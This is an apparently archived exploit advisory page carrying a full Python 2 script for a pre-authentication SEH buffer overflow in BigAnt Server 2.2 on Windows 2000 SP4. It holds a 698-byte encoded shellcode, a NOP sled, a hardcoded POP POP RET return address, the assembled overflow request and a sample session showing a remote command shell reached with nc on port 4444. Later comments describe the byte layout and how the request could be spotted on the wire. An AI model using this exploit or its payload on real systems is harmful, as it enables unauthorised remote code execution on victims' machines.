

antserver_exploit.py.txt

🗓️ 15 Apr 2008 00:00:00 · Reported by Matteo Memelli · Type: packetstorm

BigAnt Server Ver 2.2 PreAuth Remote SEH Overflow (0day), discovered and coded by Matteo Memelli aka ryujin. Tested on Windows 2000 SP4 English, which is vulnerable. The exploit code is written in Python and overflows a buffer to obtain remote shell access.

`#!/usr/bin/python  
###############################################################################  
# BigAnt Server Ver 2.2 PreAuth Remote SEH Overflow (0day)  
# Matteo Memelli aka ryujin  
# www.be4mind.com - www.gray-world.net  
# 04/13/2008  
# Tested on Windows 2000 Sp4 English  
# Vulnerable process is AntServer.exe   
# Offset for SEH overwrite is 954 Bytes  
#  
#------------------------------------------------------------------------------  
# muts you gave me the wrong pill! it's your fault!!!   
# I wanna go back to the matrix  
#------------------------------------------------------------------------------  
#  
# bt ~ # ./antserver_exploit.py -H 192.168.1.195 -P 6080  
# [+] Connecting to host...  
# [+] Overflowing the buffer...  
# [+] Done! Check your shell on 192.168.1.195:6080  
# bt ~ # nc -vv 192.168.1.195 4444  
# 192.168.1.195: inverse host lookup failed: Unknown host  
# (UNKNOWN) [192.168.1.195] 4444 (krb524) open  
# Microsoft Windows 2000 [Version 5.00.2195]  
# (C) Copyright 1985-2000 Microsoft Corp.  
#  
# C:\WINNT\system32>  
#  
###############################################################################  
from socket import *  
from optparse import OptionParser  
import sys  
  
# Banner.  These are Python 2 print statements: the script is Python-2-only
# as written and will not parse under Python 3.
print "[*********************************************************************]"
print "[* *]"
print "[* BigAnt Server PreAuth Remote SEH Overflow (0day) *]"
print "[* Discovered and Coded By *]"
print "[* Matteo Memelli *]"
print "[* (ryujin) *]"
print "[* www.be4mind.com - www.gray-world.net *]"
print "[* *]"
print "[*********************************************************************]"
# Command-line options.  -H is stored as a string in options.HOST and -P as an
# int in options.PORT.  Positional arguments are collected into `args` but are
# never read anywhere in this script.
usage = "%prog -H TARGET_HOST -P TARGET_PORT"
parser = OptionParser(usage=usage)
parser.add_option("-H", "--target_host", type="string",
                  action="store", dest="HOST",
                  help="Target Host")
parser.add_option("-P", "--target_port", type="int",
                  action="store", dest="PORT",
                  help="Target Port")
(options, args) = parser.parse_args()
HOST = options.HOST
PORT = options.PORT
# Both options are required: a missing value (or a port of 0, which is falsy)
# prints the usage text and exits.  Note that HOST and PORT are only consumed
# by the final status message further down; the connect() call below uses a
# literal address and port instead.
if not (HOST and PORT):
    parser.print_help()
    sys.exit()
  
# Tried with SEH/THREAD/PROCESS but server crashes anyway
# [*] x86/alpha_mixed succeeded, final size 698 SEH
#
# Payload bytes, reproduced verbatim from the original.  698 bytes in total
# (46 lines of 15 bytes plus a final line of 8), matching the author's
# "final size 698" note above.  The author's note says it is the output of the
# x86/alpha_mixed encoder, and the header's sample session shows a listener
# being contacted on TCP 4444 afterwards, so it is presumably a bind shell --
# nothing beyond that is verifiable from the bytes themselves.
#
# Detection note: after a short non-printable prefix the payload is almost
# entirely printable ASCII in the 0x30-0x39 / 0x41-0x5a ranges, which is the
# characteristic shape of an alphanumeric-encoded stage and is what makes the
# request below stand out on the wire.
shellcode = (
    "\x89\xe1\xda\xc0\xd9\x71\xf4\x58\x50\x59\x49\x49\x49\x49\x49"
    "\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
    "\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
    "\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
    "\x4b\x4c\x43\x5a\x4a\x4b\x50\x4d\x4b\x58\x4a\x59\x4b\x4f\x4b"
    "\x4f\x4b\x4f\x43\x50\x4c\x4b\x42\x4c\x47\x54\x47\x54\x4c\x4b"
    "\x47\x35\x47\x4c\x4c\x4b\x43\x4c\x44\x45\x43\x48\x45\x51\x4a"
    "\x4f\x4c\x4b\x50\x4f\x44\x58\x4c\x4b\x51\x4f\x51\x30\x45\x51"
    "\x4a\x4b\x47\x39\x4c\x4b\x50\x34\x4c\x4b\x43\x31\x4a\x4e\x46"
    "\x51\x49\x50\x4a\x39\x4e\x4c\x4d\x54\x49\x50\x42\x54\x44\x47"
    "\x49\x51\x49\x5a\x44\x4d\x43\x31\x49\x52\x4a\x4b\x4c\x34\x47"
    "\x4b\x46\x34\x47\x54\x47\x58\x42\x55\x4b\x55\x4c\x4b\x51\x4f"
    "\x46\x44\x43\x31\x4a\x4b\x43\x56\x4c\x4b\x44\x4c\x50\x4b\x4c"
    "\x4b\x51\x4f\x45\x4c\x43\x31\x4a\x4b\x44\x43\x46\x4c\x4c\x4b"
    "\x4d\x59\x42\x4c\x47\x54\x45\x4c\x45\x31\x49\x53\x50\x31\x49"
    "\x4b\x42\x44\x4c\x4b\x47\x33\x50\x30\x4c\x4b\x47\x30\x44\x4c"
    "\x4c\x4b\x44\x30\x45\x4c\x4e\x4d\x4c\x4b\x47\x30\x43\x38\x51"
    "\x4e\x45\x38\x4c\x4e\x50\x4e\x44\x4e\x4a\x4c\x50\x50\x4b\x4f"
    "\x4e\x36\x42\x46\x51\x43\x42\x46\x43\x58\x47\x43\x50\x32\x42"
    "\x48\x42\x57\x43\x43\x50\x32\x51\x4f\x51\x44\x4b\x4f\x4e\x30"
    "\x43\x58\x48\x4b\x4a\x4d\x4b\x4c\x47\x4b\x46\x30\x4b\x4f\x4e"
    "\x36\x51\x4f\x4d\x59\x4d\x35\x45\x36\x4b\x31\x4a\x4d\x45\x58"
    "\x43\x32\x50\x55\x42\x4a\x44\x42\x4b\x4f\x48\x50\x43\x58\x49"
    "\x49\x45\x59\x4c\x35\x4e\x4d\x50\x57\x4b\x4f\x48\x56\x46\x33"
    "\x46\x33\x50\x53\x50\x53\x46\x33\x47\x33\x46\x33\x51\x53\x46"
    "\x33\x4b\x4f\x4e\x30\x45\x36\x42\x48\x42\x31\x51\x4c\x45\x36"
    "\x50\x53\x4b\x39\x4d\x31\x4c\x55\x42\x48\x49\x34\x44\x5a\x44"
    "\x30\x49\x57\x50\x57\x4b\x4f\x49\x46\x42\x4a\x42\x30\x46\x31"
    "\x51\x45\x4b\x4f\x48\x50\x43\x58\x4e\x44\x4e\x4d\x46\x4e\x4b"
    "\x59\x51\x47\x4b\x4f\x48\x56\x46\x33\x50\x55\x4b\x4f\x48\x50"
    "\x42\x48\x4a\x45\x47\x39\x4b\x36\x47\x39\x51\x47\x4b\x4f\x4e"
    "\x36\x46\x30\x46\x34\x46\x34\x50\x55\x4b\x4f\x4e\x30\x4a\x33"
    "\x43\x58\x4a\x47\x44\x39\x49\x56\x44\x39\x46\x37\x4b\x4f\x49"
    "\x46\x46\x35\x4b\x4f\x48\x50\x42\x46\x43\x5a\x42\x44\x45\x36"
    "\x42\x48\x45\x33\x42\x4d\x4c\x49\x4d\x35\x42\x4a\x50\x50\x46"
    "\x39\x47\x59\x48\x4c\x4d\x59\x4a\x47\x43\x5a\x51\x54\x4d\x59"
    "\x4a\x42\x46\x51\x49\x50\x4c\x33\x4e\x4a\x4b\x4e\x51\x52\x46"
    "\x4d\x4b\x4e\x50\x42\x46\x4c\x4d\x43\x4c\x4d\x42\x5a\x46\x58"
    "\x4e\x4b\x4e\x4b\x4e\x4b\x42\x48\x43\x42\x4b\x4e\x4e\x53\x42"
    "\x36\x4b\x4f\x43\x45\x51\x54\x4b\x4f\x48\x56\x51\x4b\x50\x57"
    "\x46\x32\x46\x31\x50\x51\x50\x51\x43\x5a\x43\x31\x46\x31\x50"
    "\x51\x51\x45\x50\x51\x4b\x4f\x4e\x30\x42\x48\x4e\x4d\x49\x49"
    "\x43\x35\x48\x4e\x50\x53\x4b\x4f\x49\x46\x43\x5a\x4b\x4f\x4b"
    "\x4f\x47\x47\x4b\x4f\x4e\x30\x4c\x4b\x51\x47\x4b\x4c\x4b\x33"
    "\x48\x44\x45\x34\x4b\x4f\x49\x46\x46\x32\x4b\x4f\x4e\x30\x45"
    "\x38\x4a\x50\x4c\x4a\x44\x44\x51\x4f\x51\x43\x4b\x4f\x48\x56"
    "\x4b\x4f\x48\x50\x44\x4a\x41\x41"
)
  
# 77F8AEDC POP POP RET User32.dll Win 2000 Sp4
#
# Request body, 2196 bytes, assembled in this order:
#   252 x 0x90            NOP sled
#   shellcode             698-byte payload defined above
#   '\xeb\x06\x90\x90'    4 bytes occupying the next-SEH slot
#   '\xDC\xAE\xF8\x77'    0x77F8AEDC in little-endian byte order -- the handler
#                         overwrite, at offset 252 + 698 + 4 = 954, which is the
#                         "Offset for SEH overwrite is 954 Bytes" from the header
#   8 x 0x90 + 5-byte stub
#   1225 x 'C'            trailing padding
# The handler address is the pop/pop/ret the author located in the Windows
# 2000 SP4 English User32.dll (comment above); it is tied to that exact module
# build, so the same bytes presumably do nothing useful where User32.dll is
# laid out differently -- not verifiable from this file.
evilbuf = '\x90'*252 + shellcode + '\xeb\x06\x90\x90' + \
          '\xDC\xAE\xF8\x77' + '\x90'*8 + '\xE9\x82\xFC\xFF\xFF' + \
          'C'*1225
print '[+] Connecting to host...'
# socket/AF_INET/SOCK_STREAM come from the `from socket import *` at the top.
# NOTE: the connect target is this literal address and port, not the HOST/PORT
# values parsed from the command line; those are only echoed in the final
# message below.
s = socket(AF_INET, SOCK_STREAM)
s.connect(('192.168.1.195', 6080))
print '[+] Overflowing the buffer...'
# One request line -- "GET " + evilbuf + "\n\n" -- sent before any
# authentication (hence "PreAuth" in the title).  No response is read; the
# socket is closed immediately after the send.  Detection note: a single
# "GET " line of roughly 2.2 KB with a 252-byte 0x90 run and a 1225-byte run
# of 'C' is an easily recognisable request shape for this service.
s.send('GET ' + evilbuf + "\n\n")
s.close()
print '[+] Done! Check your shell on %s:%d' % (HOST, PORT)
  
`
